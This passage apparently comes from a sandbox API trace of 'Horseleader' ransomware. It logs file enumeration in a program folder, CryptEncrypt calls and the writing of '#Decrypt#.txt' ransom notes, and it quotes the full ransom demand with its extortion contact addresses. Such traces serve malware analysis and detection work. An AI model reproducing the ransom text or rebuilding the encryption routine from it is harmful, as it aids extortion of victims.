hTemplateFile=0x0) returned 0xffffffff [0251.975] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8e3932, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8e3932, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.975] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.975] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png") returned 95 [0251.975] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.975] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.976] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.976] lstrlenW (lpString=".testttjffg") returned 11 [0251.976] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.976] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.976] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\vignette\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.976] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.976] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.976] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png") returned 90 [0251.976] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.976] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.976] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.976] lstrlenW (lpString=".testttjffg") returned 11 [0251.976] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.976] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.976] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.977] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.977] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.977] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.977] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.977] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.977] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.977] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.977] lstrlenW (lpString=".testttjffg") returned 11 [0251.977] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.977] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.977] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.977] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.977] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.977] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png") returned 87 [0251.978] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.978] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.978] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.978] lstrlenW (lpString=".testttjffg") returned 11 [0251.978] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.978] CryptGenRandom (in: hProv=0x7c6248, 
dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.978] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.978] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.978] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.978] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.979] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.979] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.979] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.979] lstrlenW (lpString=".testttjffg") returned 11 [0251.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.979] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c2b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="softedges.png", cAlternateFileName="")) returned 1 [0251.979] lstrcmpiW (lpString1="softedges.png", lpString2="Windows") returned -1 [0251.979] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png") returned 70 [0251.979] StrStrIW (lpFirst="softedges.png", lpSrch=".horseleader") returned 0x0 [0251.979] lstrcmpW (lpString1="softedges.png", lpString2="#Decrypt#.txt") returned 1 [0251.980] lstrcmpW (lpString1="softedges.png", lpString2="_uninstalling_.png") returned 1 [0251.980] lstrlenW (lpString=".testttjffg") returned 11 [0251.980] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", lpSrch=".testttjffg") returned 0x0 [0251.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.980] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdcdf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vignettemask25.png", cAlternateFileName="")) returned 1 [0251.980] lstrcmpiW (lpString1="vignettemask25.png", lpString2="Windows") returned -1 [0251.980] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png") returned 75 [0251.980] StrStrIW (lpFirst="vignettemask25.png", lpSrch=".horseleader") returned 0x0 [0251.980] lstrcmpW (lpString1="vignettemask25.png", lpString2="#Decrypt#.txt") returned 1 [0251.980] lstrcmpW (lpString1="vignettemask25.png", lpString2="_uninstalling_.png") returned 1 [0251.980] lstrlenW (lpString=".testttjffg") returned 11 [0251.980] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", lpSrch=".testttjffg") returned 0x0 [0251.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whiteband.png", cAlternateFileName="")) returned 1 [0251.981] lstrcmpiW (lpString1="whiteband.png", lpString2="Windows") returned -1 [0251.981] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png") returned 70 [0251.981] StrStrIW (lpFirst="whiteband.png", lpSrch=".horseleader") returned 0x0 [0251.981] lstrcmpW (lpString1="whiteband.png", lpString2="#Decrypt#.txt") returned 1 [0251.981] lstrcmpW (lpString1="whiteband.png", lpString2="_uninstalling_.png") returned 1 [0251.981] lstrlenW (lpString=".testttjffg") returned 11 [0251.981] StrStrW (lpFirst="\\\\?\\C:\\Program 
Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", lpSrch=".testttjffg") returned 0x0 [0251.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.981] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whiteband.png", cAlternateFileName="")) returned 0 [0251.982] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.983] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\#Decrypt#.txt") returned 70 [0251.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.984] lstrlenA (lpString="All your files 
have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.985] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.989] lstrlenA (lpString="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") returned 1368 [0251.989] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.989] CloseHandle (hObject=0x158) returned 1 [0251.989] GetProcessHeap () returned 0x780000 [0251.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WhiteDot.png", cAlternateFileName="")) returned 1 [0251.989] lstrcmpiW (lpString1="WhiteDot.png", lpString2="Windows") returned -1 [0251.989] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png") returned 60 [0251.989] StrStrIW (lpFirst="WhiteDot.png", lpSrch=".horseleader") returned 0x0 [0251.989] lstrcmpW (lpString1="WhiteDot.png", lpString2="#Decrypt#.txt") returned 1 [0251.989] lstrcmpW (lpString1="WhiteDot.png", lpString2="_uninstalling_.png") returned 1 [0251.989] lstrlenW (lpString=".testttjffg") returned 11 [0251.989] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\WhiteDot.png", lpSrch=".testttjffg") returned 0x0 [0251.989] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.990] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WhiteDot.png", cAlternateFileName="")) returned 0 [0251.990] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\#Decrypt#.txt") returned 61 [0251.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.991] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us 
via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0251.991] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.993] lstrlenA (lpString="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") returned 1368 [0251.993] WriteFile (in: hFile=0x21c, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aee10*=0x558, lpOverlapped=0x0) returned 1 [0251.993] CloseHandle (hObject=0x21c) returned 1 [0251.993] GetProcessHeap () returned 0x780000 [0251.993] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b628 | out: hHeap=0x780000) returned 1 [0251.993] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9060745b, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x9060745b, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x4877fc17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x379f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Filters.xml", cAlternateFileName="")) returned 1 [0251.993] lstrcmpiW (lpString1="Filters.xml", lpString2="Windows") returned -1 [0251.993] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\Filters.xml") returned 49 [0251.994] StrStrIW (lpFirst="Filters.xml", lpSrch=".horseleader") returned 0x0 [0251.994] lstrcmpW 